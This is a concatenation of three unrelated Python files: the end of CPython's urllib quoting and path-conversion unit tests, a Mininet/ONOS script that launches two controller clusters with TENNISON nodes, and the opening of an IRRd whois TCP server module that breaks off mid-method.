result)) # Characters in Latin-1 range, encoded by with None (default) result = urllib.parse.quote(given, encoding=None, errors=None) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in Latin-1 range, encoded with Latin-1 given = "\xa2\xd8ab\xff" expect = "%A2%D8ab%FF" result = urllib.parse.quote(given, encoding="latin-1") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in BMP, encoded by default in UTF-8 given = "\u6f22\u5b57" # "Kanji" expect = "%E6%BC%A2%E5%AD%97" result = urllib.parse.quote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in BMP, encoded with Latin-1 given = "\u6f22\u5b57" self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given, encoding="latin-1") # Characters in BMP, encoded with Latin-1, with replace error handling given = "\u6f22\u5b57" expect = "%3F%3F" # "??" result = urllib.parse.quote(given, encoding="latin-1", errors="replace") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) # Characters in BMP, Latin-1, with xmlcharref error handling given = "\u6f22\u5b57" expect = "%26%2328450%3B%26%2323383%3B" # "&#28450;&#23383;" result = urllib.parse.quote(given, encoding="latin-1", errors="xmlcharrefreplace") self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) def test_quote_plus_with_unicode(self): # Encoding (latin-1) test for quote_plus given = "\xa2\xd8 \xff" expect = "%A2%D8+%FF" result = urllib.parse.quote_plus(given, encoding="latin-1") self.assertEqual(expect, result, "using quote_plus(): %r != %r" % (expect, result)) # Errors test for quote_plus given = "ab\u6f22\u5b57 cd" expect = "ab%3F%3F+cd" result = urllib.parse.quote_plus(given, encoding="latin-1", errors="replace") self.assertEqual(expect, result, "using quote_plus(): %r != %r" % (expect, result)) class UnquotingTests(unittest.TestCase): """Tests for unquote() and unquote_plus() See the doc string for quoting_Tests for details on quoting and such. """ def test_unquoting(self): # Make sure unquoting of all ASCII values works escape_list = [] for num in range(128): given = hexescape(chr(num)) expect = chr(num) result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) result = urllib.parse.unquote_plus(given) self.assertEqual(expect, result, "using unquote_plus(): %r != %r" % (expect, result)) escape_list.append(given) escape_string = ''.join(escape_list) del escape_list result = urllib.parse.unquote(escape_string) self.assertEqual(result.count('%'), 1, "using unquote(): not all characters escaped: " "%s" % result) self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None) self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ()) with support.check_warnings(('', BytesWarning), quiet=True): self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'') def test_unquoting_badpercent(self): # Test unquoting on bad percent-escapes given = '%xab' expect = given result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) given = '%x' expect = given result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) given = '%' expect = given result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # unquote_to_bytes given = '%xab' expect = bytes(given, 'ascii') result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) given = '%x' expect = bytes(given, 'ascii') result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) given = '%' expect = bytes(given, 'ascii') result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None) self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ()) def test_unquoting_mixed_case(self): # Test unquoting on mixed-case hex digits in the percent-escapes given = '%Ab%eA' expect = b'\xab\xea' result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) def test_unquoting_parts(self): # Make sure unquoting works when have non-quoted characters # interspersed given = 'ab%sd' % hexescape('c') expect = "abcd" result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using quote(): %r != %r" % (expect, result)) result = urllib.parse.unquote_plus(given) self.assertEqual(expect, result, "using unquote_plus(): %r != %r" % (expect, result)) def test_unquoting_plus(self): # Test difference between unquote() and unquote_plus() given = "are+there+spaces..." expect = given result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) expect = given.replace('+', ' ') result = urllib.parse.unquote_plus(given) self.assertEqual(expect, result, "using unquote_plus(): %r != %r" % (expect, result)) def test_unquote_to_bytes(self): given = 'br%C3%BCckner_sapporo_20050930.doc' expect = b'br\xc3\xbcckner_sapporo_20050930.doc' result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) # Test on a string with unescaped non-ASCII characters # (Technically an invalid URI; expect those characters to be UTF-8 # encoded). result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC") expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc" self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) # Test with a bytes as input given = b'%A2%D8ab%FF' expect = b'\xa2\xd8ab\xff' result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) # Test with a bytes as input, with unescaped non-ASCII bytes # (Technically an invalid URI; expect those bytes to be preserved) given = b'%A2\xd8ab%FF' expect = b'\xa2\xd8ab\xff' result = urllib.parse.unquote_to_bytes(given) self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r" % (expect, result)) def test_unquote_with_unicode(self): # Characters in the Latin-1 range, encoded with UTF-8 given = 'br%C3%BCckner_sapporo_20050930.doc' expect = 'br\u00fcckner_sapporo_20050930.doc' result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Characters in the Latin-1 range, encoded with None (default) result = urllib.parse.unquote(given, encoding=None, errors=None) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Characters in the Latin-1 range, encoded with Latin-1 result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc', encoding="latin-1") expect = 'br\u00fcckner_sapporo_20050930.doc' self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Characters in BMP, encoded with UTF-8 given = "%E6%BC%A2%E5%AD%97" expect = "\u6f22\u5b57" # "Kanji" result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Decode with UTF-8, invalid sequence given = "%F3%B1" expect = "\ufffd" # Replacement character result = urllib.parse.unquote(given) self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Decode with UTF-8, invalid sequence, replace errors result = urllib.parse.unquote(given, errors="replace") self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # Decode with UTF-8, invalid sequence, ignoring errors given = "%F3%B1" expect = "" result = urllib.parse.unquote(given, errors="ignore") self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # A mix of non-ASCII and percent-encoded characters, UTF-8 result = urllib.parse.unquote("\u6f22%C3%BC") expect = '\u6f22\u00fc' self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) # A mix of non-ASCII and percent-encoded characters, Latin-1 # (Note, the string contains non-Latin-1-representable characters) result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1") expect = '\u6f22\u00fc' self.assertEqual(expect, result, "using unquote(): %r != %r" % (expect, result)) class urlencode_Tests(unittest.TestCase): """Tests for urlencode()""" def help_inputtype(self, given, test_type): """Helper method for testing different input types. 'given' must lead to only the pairs: * 1st, 1 * 2nd, 2 * 3rd, 3 Test cannot assume anything about order. Docs make no guarantee and have possible dictionary input. """ expect_somewhere = ["1st=1", "2nd=2", "3rd=3"] result = urllib.parse.urlencode(given) for expected in expect_somewhere: self.assertIn(expected, result, "testing %s: %s not found in %s" % (test_type, expected, result)) self.assertEqual(result.count('&'), 2, "testing %s: expected 2 '&'s; got %s" % (test_type, result.count('&'))) amp_location = result.index('&') on_amp_left = result[amp_location - 1] on_amp_right = result[amp_location + 1] self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(), "testing %s: '&' not located in proper place in %s" % (test_type, result)) self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps "testing %s: " "unexpected number of characters: %s != %s" % (test_type, len(result), (5 * 3) + 2)) def test_using_mapping(self): # Test passing in a mapping object as an argument. self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'}, "using dict as input type") def test_using_sequence(self): # Test passing in a sequence of two-item sequences as an argument. self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')], "using sequence of two-item tuples as input") def test_quoting(self): # Make sure keys and values are quoted using quote_plus() given = {"&":"="} expect = "%s=%s" % (hexescape('&'), hexescape('=')) result = urllib.parse.urlencode(given) self.assertEqual(expect, result) given = {"key name":"A bunch of pluses"} expect = "key+name=A+bunch+of+pluses" result = urllib.parse.urlencode(given) self.assertEqual(expect, result) def test_doseq(self): # Test that passing True for 'doseq' parameter works correctly given = {'sequence':['1', '2', '3']} expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3'])) result = urllib.parse.urlencode(given) self.assertEqual(expect, result) result = urllib.parse.urlencode(given, True) for value in given["sequence"]: expect = "sequence=%s" % value self.assertIn(expect, result) self.assertEqual(result.count('&'), 2, "Expected 2 '&'s, got %s" % result.count('&')) def test_empty_sequence(self): self.assertEqual("", urllib.parse.urlencode({})) self.assertEqual("", urllib.parse.urlencode([])) def test_nonstring_values(self): self.assertEqual("a=1", urllib.parse.urlencode({"a": 1})) self.assertEqual("a=None", urllib.parse.urlencode({"a": None})) def test_nonstring_seq_values(self): self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True)) self.assertEqual("a=None&a=a", urllib.parse.urlencode({"a": [None, "a"]}, True)) data = collections.OrderedDict([("a", 1), ("b", 1)]) self.assertEqual("a=a&a=b", urllib.parse.urlencode({"a": data}, True)) def test_urlencode_encoding(self): # ASCII encoding. Expect %3F with errors="replace' given = (('\u00a0', '\u00c1'),) expect = '%3F=%3F' result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace") self.assertEqual(expect, result) # Default is UTF-8 encoding. given = (('\u00a0', '\u00c1'),) expect = '%C2%A0=%C3%81' result = urllib.parse.urlencode(given) self.assertEqual(expect, result) # Latin-1 encoding. given = (('\u00a0', '\u00c1'),) expect = '%A0=%C1' result = urllib.parse.urlencode(given, encoding="latin-1") self.assertEqual(expect, result) def test_urlencode_encoding_doseq(self): # ASCII Encoding. Expect %3F with errors="replace' given = (('\u00a0', '\u00c1'),) expect = '%3F=%3F' result = urllib.parse.urlencode(given, doseq=True, encoding="ASCII", errors="replace") self.assertEqual(expect, result) # ASCII Encoding. On a sequence of values. given = (("\u00a0", (1, "\u00c1")),) expect = '%3F=1&%3F=%3F' result = urllib.parse.urlencode(given, True, encoding="ASCII", errors="replace") self.assertEqual(expect, result) # Utf-8 given = (("\u00a0", "\u00c1"),) expect = '%C2%A0=%C3%81' result = urllib.parse.urlencode(given, True) self.assertEqual(expect, result) given = (("\u00a0", (42, "\u00c1")),) expect = '%C2%A0=42&%C2%A0=%C3%81' result = urllib.parse.urlencode(given, True) self.assertEqual(expect, result) # latin-1 given = (("\u00a0", "\u00c1"),) expect = '%A0=%C1' result = urllib.parse.urlencode(given, True, encoding="latin-1") self.assertEqual(expect, result) given = (("\u00a0", (42, "\u00c1")),) expect = '%A0=42&%A0=%C1' result = urllib.parse.urlencode(given, True, encoding="latin-1") self.assertEqual(expect, result) def test_urlencode_bytes(self): given = ((b'\xa0\x24', b'\xc1\x24'),) expect = '%A0%24=%C1%24' result = urllib.parse.urlencode(given) self.assertEqual(expect, result) result = urllib.parse.urlencode(given, True) self.assertEqual(expect, result) # Sequence of values given = ((b'\xa0\x24', (42, b'\xc1\x24')),) expect = '%A0%24=42&%A0%24=%C1%24' result = urllib.parse.urlencode(given, True) self.assertEqual(expect, result) def test_urlencode_encoding_safe_parameter(self): # Send '$' (\x24) as safe character # Default utf-8 encoding given = ((b'\xa0\x24', b'\xc1\x24'),) result = urllib.parse.urlencode(given, safe=":$") expect = '%A0$=%C1$' self.assertEqual(expect, result) given = ((b'\xa0\x24', b'\xc1\x24'),) result = urllib.parse.urlencode(given, doseq=True, safe=":$") expect = '%A0$=%C1$' self.assertEqual(expect, result) # Safe parameter in sequence given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),) expect = '%A0$=%C1$&%A0$=13&%A0$=42' result = urllib.parse.urlencode(given, True, safe=":$") self.assertEqual(expect, result) # Test all above in latin-1 encoding given = ((b'\xa0\x24', b'\xc1\x24'),) result = urllib.parse.urlencode(given, safe=":$", encoding="latin-1") expect = '%A0$=%C1$' self.assertEqual(expect, result) given = ((b'\xa0\x24', b'\xc1\x24'),) expect = '%A0$=%C1$' result = urllib.parse.urlencode(given, doseq=True, safe=":$", encoding="latin-1") given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),) expect = '%A0$=%C1$&%A0$=13&%A0$=42' result = urllib.parse.urlencode(given, True, safe=":$", encoding="latin-1") self.assertEqual(expect, result) class Pathname_Tests(unittest.TestCase): """Test pathname2url() and url2pathname()""" def test_basic(self): # Make sure simple tests pass expected_path = os.path.join("parts", "of", "a", "path") expected_url = "parts/of/a/path" result = urllib.request.pathname2url(expected_path) self.assertEqual(expected_url, result, "pathname2url() failed; %s != %s" % (result, expected_url)) result = urllib.request.url2pathname(expected_url) self.assertEqual(expected_path, result, "url2pathame() failed; %s != %s" % (result, expected_path)) def test_quoting(self): # Test automatic quoting and unquoting works for pathnam2url() and # url2pathname() respectively given = os.path.join("needs", "quot=ing", "here") expect = "needs/%s/here" % urllib.parse.quote("quot=ing") result = urllib.request.pathname2url(given) self.assertEqual(expect, result, "pathname2url() failed; %s != %s" % (expect, result)) expect = given result = urllib.request.url2pathname(result) self.assertEqual(expect, result, "url2pathname() failed; %s != %s" % (expect, result)) given = os.path.join("make sure", "using_quote") expect = "%s/using_quote" % urllib.parse.quote("make sure") result = urllib.request.pathname2url(given) self.assertEqual(expect, result, "pathname2url() failed; %s != %s" % (expect, result)) given = "make+sure/using_unquote" expect = os.path.join("make+sure", "using_unquote") result = urllib.request.url2pathname(given) self.assertEqual(expect, result, "url2pathname() failed; %s != %s" % (expect, result)) @unittest.skipUnless(sys.platform == 'win32', 'test specific to the urllib.url2path function.') def test_ntpath(self): given = ('/C:/', '///C:/', '/C|//') expect = 'C:\\' for url in given: result = urllib.request.url2pathname(url) self.assertEqual(expect, result, 'urllib.request..url2pathname() failed; %s != %s' % (expect, result)) given = '///C|/path' expect = 'C:\\path' result = urllib.request.url2pathname(given) self.assertEqual(expect, result, 'urllib.request.url2pathname() failed; %s != %s' % (expect, result)) class Utility_Tests(unittest.TestCase): """Testcase to test the various utility functions in the urllib.""" def test_thishost(self): """Test the urllib.request.thishost utility function returns a tuple""" self.assertIsInstance(urllib.request.thishost(), tuple) class URLopener_Tests(unittest.TestCase): """Testcase to test the open method of URLopener class.""" def test_quoted_open(self): class DummyURLopener(urllib.request.URLopener): def open_spam(self, url): return url with support.check_warnings( ('DummyURLopener style of invoking requests is deprecated.', DeprecationWarning)): self.assertEqual(DummyURLopener().open( 'spam://example/ /'),'//example/%20/') # test the safe characters are not quoted by urlopen self.assertEqual(DummyURLopener().open( "spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"), "//c:|windows%/:=&?~#+!$,;'@()*[]|/path/") # Just commented them out. # Can't really tell why keep failing in windows and sparc. # Everywhere else they work ok, but on those machines, sometimes # fail in one of the tests, sometimes in other. I have a linux, and # the tests go ok. # If anybody has one of the problematic environments, please help! # . Facundo # # def server(evt): # import socket, time # serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # serv.settimeout(3) # serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # serv.bind(("", 9093)) # serv.listen() # try: # conn, addr = serv.accept() # conn.send("1 Hola mundo\n") # cantdata = 0 # while cantdata < 13: # data = conn.recv(13-cantdata) # cantdata += len(data) # time.sleep(.3) # conn.send("2 No more lines\n") # conn.close() # except socket.timeout: # pass # finally: # serv.close() # evt.set() # # class FTPWrapperTests(unittest.TestCase): # # def setUp(self): # import ftplib, time, threading # ftplib.FTP.port = 9093 # self.evt = threading.Event() # threading.Thread(target=server, args=(self.evt,)).start() # time.sleep(.1) # # def tearDown(self): # self.evt.wait() # # def testBasic(self): # # connects # ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, []) # ftp.close() # # def testTimeoutNone(self): # # global default timeout is ignored # import socket # self.assertIsNone(socket.getdefaulttimeout()) # socket.setdefaulttimeout(30) # try: # ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, []) # finally: # socket.setdefaulttimeout(None) # self.assertEqual(ftp.ftp.sock.gettimeout(), 30) # ftp.close() # # def testTimeoutDefault(self): # # global default timeout is used # import socket # self.assertIsNone(socket.getdefaulttimeout()) # socket.setdefaulttimeout(30) # try: # ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, []) # finally: # socket.setdefaulttimeout(None) # self.assertEqual(ftp.ftp.sock.gettimeout(), 30) # ftp.close() # # def testTimeoutValue(self): # ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [], # timeout=30) # self.assertEqual(ftp.ftp.sock.gettimeout(), 30) # ftp.close() class RequestTests(unittest.TestCase): """Unit tests for urllib.request.Request.""" def test_default_values(self): Request = urllib.request.Request request = Request("http://www.python.org") self.assertEqual(request.get_method(), 'GET') request = Request("http://www.python.org", {}) self.assertEqual(request.get_method(), 'POST') def test_with_method_arg(self): Request = urllib.request.Request request = Request("http://www.python.org", method='HEAD') self.assertEqual(request.method, 'HEAD') self.assertEqual(request.get_method(), 'HEAD') request = Request("http://www.python.org", {}, method='HEAD') self.assertEqual(request.method, 'HEAD') self.assertEqual(request.get_method(), 'HEAD') request = Request("http://www.python.org", method='GET') self.assertEqual(request.get_method(), 'GET') request.method = 'HEAD' self.assertEqual(request.get_method(), 'HEAD') class URL2PathNameTests(unittest.TestCase): def test_converting_drive_letter(self): self.assertEqual(url2pathname("///C|"), 'C:') self.assertEqual(url2pathname("///C:"), 'C:') self.assertEqual(url2pathname("///C|/"), 'C:\\') def test_converting_when_no_drive_letter(self): # cannot end a raw string in \ self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\') self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\') def test_simple_compare(self): self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"), r'C:\foo\bar\spam.foo') def test_non_ascii_drive_letter(self): self.assertRaises(IOError, url2pathname, "///\u00e8|/") def test_roundtrip_url2pathname(self): list_of_paths = ['C:', r'\\\C\test\\', r'C:\foo\bar\spam.foo' ] for path in list_of_paths: self.assertEqual(url2pathname(pathname2url(path)), path) class PathName2URLTests(unittest.TestCase): def test_converting_drive_letter(self): self.assertEqual(pathname2url("C:"), '///C:') self.assertEqual(pathname2url("C:\\"), '///C:') def test_converting_when_no_drive_letter(self): self.assertEqual(pathname2url(r"\\\folder\test" "\\"), '/////folder/test/') self.assertEqual(pathname2url(r"\\folder\test" "\\"), '////folder/test/') self.assertEqual(pathname2url(r"\folder\test" "\\"), '/folder/test/') def test_simple_compare(self): self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'), "///C:/foo/bar/spam.foo" ) def test_long_drive_letter(self): self.assertRaises(IOError, pathname2url, "XX:\\") def test_roundtrip_pathname2url(self): list_of_paths = ['///C:', '/////folder/test/', '///C:/foo/bar/spam.foo'] for path in list_of_paths: self.assertEqual(pathname2url(url2pathname(path)), path) if __name__ == '__main__': unittest.main()
multicluster.py
#!/usr/bin/python """ multicluster.py: multiple ONOS clusters example We create two ONOSClusters, "east" and "west", and a LinearTopo data network where the first and second halves of the network are connected to each ONOSCluster, respectively. The size of the ONOSCluster is determined by its topology. In this example the topology is a SingleSwitchTopo of size 1, so the "Cluster" is actually a single node (for performance and resource usage reasons.) However, it is possible to use larger cluster sizes in a large (!) Mininet VM, (e.g. 12 GB of RAM for two 3-node ONOS clusters.) The MultiSwitch class is a customized version of ONOSOVSSwitch that has a "controller" instance variable (and parameter) """ from mininet.net import Mininet from mininet.topo import LinearTopo, SingleSwitchTopo from mininet.log import setLogLevel from mininet.topolib import TreeTopo, TorusTopo from mininet.clean import cleanup from mininet.util import quietRun, specialClass from mininet.log import setLogLevel, info, warn, error, debug from onos import ONOSCluster, ONOSOVSSwitch, ONOSCLI, RenamedTopo from tennison import TENNISONNode import logging import threading import time import sys from colorama import init init(strip=not sys.stdout.isatty()) # strip colors if stdout is redirected from termcolor import cprint from pyfiglet import figlet_format class MultiSwitch( ONOSOVSSwitch ): "Custom OVSSwitch() subclass that connects to different clusters" def __init__( self, *args, **kwargs ): "controller: controller/ONOSCluster to connect to" self.controller = kwargs.pop( 'controller', None ) ONOSOVSSwitch.__init__( self, *args, **kwargs ) def start( self, controllers ): "Start and connect to our previously specified controller" return ONOSOVSSwitch.start( self, [ self.controller ] ) def run(): "Test a multiple ONOS cluster network" #setLogLevel( 'error' ) cprint(figlet_format('TENNISON', font='slant'), 'red') setLogLevel( 'info' ) loading_bar_thread = threading.Thread(name='loading_bar', target=loading_bar) #loading_bar_thread.start() #progress(10, 100, status='Processing topology') # East and west control network topologies (using RenamedTopo) # We specify switch and host prefixes to avoid name collisions # East control switch prefix: 'east_cs', ONOS node prefix: 'east_onos' # Each network is a renamed SingleSwitchTopo of size clusterSize # It's also possible to specify your own control network topology clusterSize = 1 update_loading_bar(5, 'Transforiming cluster toplogies') etopo = RenamedTopo( SingleSwitchTopo, clusterSize, snew='a_cs', hnew='alpha_c' ) wtopo = RenamedTopo( SingleSwitchTopo, clusterSize, snew='b_cs', hnew='beta_c' ) # east and west ONOS clusters # Note that we specify the NAT node names to avoid name collisions #progress(20, 100, status='Launching ONOS cluster alpha') update_loading_bar(10, 'Creating alpha cluster') alpha_cluster = ONOSCluster( 'alpha', topo=etopo, ipBase='192.168.123.0/24', nat='alpha_nat' ) update_loading_bar(10, 'Creating beta cluster') #progress(50, 100, status='Launching ONOS cluster beta') beta_cluster = ONOSCluster( 'beta', topo=wtopo, ipBase='192.168.124.0/24', nat='beta_nat', portOffset=100 ) # Data network topology. TODO Add link delays and change topo. #progress(70, 100, status='Initialising topology') update_loading_bar(10, 'Creating topology') topo = LinearTopo( 10 ) #topo = TreeTopo(2) #progress(80, 100, status='Creating network') # Create network update_loading_bar(5, 'Compiling topologies') net = Mininet( topo=topo, switch=MultiSwitch, controller=[ alpha_cluster, beta_cluster ] ) #progress(85, 100, status='Launching TENNISON instance alpha') update_loading_bar(5, 'Adding tennison alpha') tennison_alpha = net.addHost('alpha_t', cls=TENNISONNode, ipBase='192.168.123.1/24', ip='192.168.123.100', gw='192.168.123.2') net.addLink(tennison_alpha, alpha_cluster.net.get('a_cs1')) #progress(90, 100, status='Launching TENNISON instance beta') update_loading_bar(5, 'Adding tennison beta') tennison_beta = net.addHost('beta_t', cls=TENNISONNode, portOffset=100, ipBase='192.168.124.1/24', ip='192.168.124.100', gw='192.168.124.2') net.addLink(tennison_beta, beta_cluster.net.get('b_cs1')) # Assign switches to controllers count = len( net.switches ) #TODO this will have to change depending on the topology for i, switch in enumerate( net.switches ): #progress(90+i, 100, status='Connecting switches to ONOS') switch.controller = alpha_cluster if i < count/2 else beta_cluster #TODO Need to add TENNISON here. Connect TENNISON to controller switches #TENNISON is a mininet Node with a direct connect to ONOS (preferably not over loopback) # Start up network #progress(99, 100, status='Loading network, please wait') update_loading_bar(5, 'Launching network, please wait') net.start() #tennison_alpha.setIP('192.168.123.2') #progress(100, 100, status='Complete') # This code should be placed in the Tennison class update_loading_bar(5, 'Starting tennison alpha') output = tennison_alpha.cmd('ifconfig alpha_t-eth0 192.168.123.100') output = tennison_alpha.cmd('route add default gw 192.168.123.2') output = tennison_alpha.cmd('ifconfig lo up') #info('Setting tennison alpha ip ' + output) tennison_alpha.start() update_loading_bar(5, 'Starting tennison beta') output = tennison_beta.cmd('ifconfig beta_t-eth0 192.168.124.100') output = tennison_beta.cmd('route add default gw 192.168.124.2') output = tennison_beta.cmd('ifconfig lo up') ##info('Setting tennison beta ip ' + output) tennison_beta.start() fixIPTables() #Install onos apps alpha_cluster.net.get('alpha_c1').cmd('/opt/onos/tools/dev/bash_profile') alpha_cluster.net.get('alpha_c1').cmd('/opt/onos-tennison-apps/install_apps_remote > onos-apps.log') beta_cluster.net.get('beta_c1').cmd('/opt/onos/tools/dev/bash_profile') beta_cluster.net.get('beta_c1').cmd('/opt/onos-tennison-apps/install_apps_remote > onos-apps.log') update_loading_bar(100, 'Loading complete') time.sleep(1) setLogLevel( 'info' ) info('\n') global Loading Loading = False ONOSCLI( net ) # run our special unified Mininet/ONOS CLI tennison_alpha.stop() tennison_beta.stop() net.stop() def update_loading_bar(increment, status): global Progress, Status Progress += increment Status = status def fixIPTables(): "Fix LinuxBridge warning" for s in 'arp', 'ip', 'ip6': quietRun( 'sysctl net.bridge.bridge-nf-call-%stables=0' % s ) Loading = True Progress = 0 Status = '' def loading_bar(): global Loading, Progress, Status while(Loading): time.sleep(0.5) Progress +=1 if Progress > 100: Progress = 100 Loading = False progress(Progress, 100, status=Status) time.sleep(0.5) def progress(count, total, status=''): if( not Loading ): return sys.stdout.write("\033[K") bar_len = 46 filled_len = int(round(bar_len * count / float(total))) percents = round(100.0 * count / float(total), 1) bar = '=' * filled_len + '-' * (bar_len - filled_len) sys.stdout.write('\r[%s] %s%s ...%s\r' % (bar, percents, '%', status)) sys.stdout.flush() # Add a "controllers" command to ONOSCLI def do_controllers( self, line ): "List controllers assigned to switches" cmap = {} for s in self.mn.switches: c = getattr( s, 'controller', None ).name cmap.setdefault( c, [] ).append( s.name ) for c in sorted( cmap.keys() ): switches = ' '.join( cmap[ c ] ) print '%s: %s' % ( c, switches ) ONOSCLI.do_controllers = do_controllers if __name__ == '__main__': try: run() except (KeyboardInterrupt, SystemExit): Loading = False except Exception as e: Loading = False error('ERROR: ' + str(e) + '\n') # sys.exit()
server.py
import logging import multiprocessing as mp import os import signal import socket import socketserver import threading import time from IPy import IP from setproctitle import setproctitle from irrd.conf import get_setting, get_configuration from irrd.server.access_check import is_client_permitted from irrd.server.whois.query_parser import WhoisQueryParser from irrd.storage.database_handler import DatabaseHandler from irrd.storage.preload import Preloader logger = logging.getLogger(__name__) mp.allow_connection_pickling() # Covered by integration tests def start_whois_server(): # pragma: no cover """ Start the whois server, listening forever. This function does not return, except after SIGTERM is received. """ setproctitle('irrd-whois-server-listener') address = (get_setting('server.whois.interface'), get_setting('server.whois.port')) logger.info(f'Starting whois server on TCP {address}') server = WhoisTCPServer( server_address=address, ) # When this process receives SIGTERM, shut down the server cleanly. def sigterm_handler(signum, frame): nonlocal server def shutdown(server): logging.info('Whois server shutting down') server.shutdown() server.server_close() # Shutdown must be called from a thread to prevent blocking. threading.Thread(target=shutdown, args=(server,)).start() signal.signal(signal.SIGTERM, sigterm_handler) def sighup_handler(signum, frame): nonlocal server def sighup(server): get_configuration().reload() server.sighup_workers() # sighup must be called from a thread to prevent blocking. threading.Thread(target=sighup, args=(server,)).start() signal.signal(signal.SIGHUP, sighup_handler) server.serve_forever() class WhoisTCPServer(socketserver.TCPServer): # pragma: no cover """ Server for whois queries. Starts a number of worker processes that handle the client connections. Whenever a client is connected, the connection is pushed onto a queue, from which a worker picks it up. The workers are responsible for the connection from then on. """ allow_reuse_address = True request_queue_size = 50 def __init__(self, server_address, bind_and_activate=True): # noqa: N803 self.address_family = socket.AF_INET6 if IP(server_address[0]).version() == 6 else socket.AF_INET super().__init__(server_address, None, bind_and_activate) self.connection_queue = mp.Queue() self.workers = [] for i in range(int(get_setting('server.whois.max_connections'))): worker = WhoisWorker(self.connection_queue) worker.start() self.workers.append(worker) def process_request(self, request, client_address): """Push the client connection onto the queue for further handling.""" self.connection_queue.put((request, client_address)) def handle_error(self, request, client_address): logger.error(f'Error while handling request from {client_address}', exc_info=True) def sighup_workers(self): for worker in self.workers: os.kill(worker.pid, signal.SIGHUP) def shutdown(self): """ Shut down the server, by killing all child processes, and then deferring to built-in TCPServer shutdown. """ for worker in self.workers: try: worker.terminate() worker.join() except Exception: # pragma: no cover pass return super().shutdown() class WhoisWorker(mp.Process, socketserver.StreamRequestHandler): """ A whois worker is a process that handles whois client connections, which are retrieved from a queue. After handling a connection, the process waits for the next connection from the queue.s """ def __init__(self, connection_queue, *args, **kwargs): self.connection_queue = connection_queue # Note that StreamRequestHandler.__init__ is not called - the # input for that is not available, as it's retrieved from the queue. super().__init__(*args, **kwargs) def run(self, keep_running=True) -> None: """ Whois worker run loop. This method does not return, except if it failed to initialise a preloader, or if keep_running is set, after the first request is handled. The latter is used in the tests. """ # Disable the special sigterm_handler defined in start_whois_server() # (signal handlers are inherited) signal.signal(signal.SIGTERM, signal.SIG_DFL) try: self.preloader = Preloader() self.database_handler = DatabaseHandler(readonly=True) except Exception as e: logger.error(f'Whois worker failed to initialise preloader or database,' f'unable to start, traceback follows: {e}', exc_info=e) return while True: try: setproctitle('irrd-whois-worker') self.request, self.client_address = self.connection_queue.get() self.setup() self.handle_connection() self.finish() self.close_request() except Exception as e: try: self.close_request() except Exception: # pragma: no cover pass logger.error(f'Failed to handle whois connection, traceback follows: {e}', exc_info=e) if not keep_running: break def close_request(self): # Close the connection in the same way normally done by TCPServer try: # explicitly shutdown. socket.close() merely releases # the socket and waits for GC to perform the actual close. 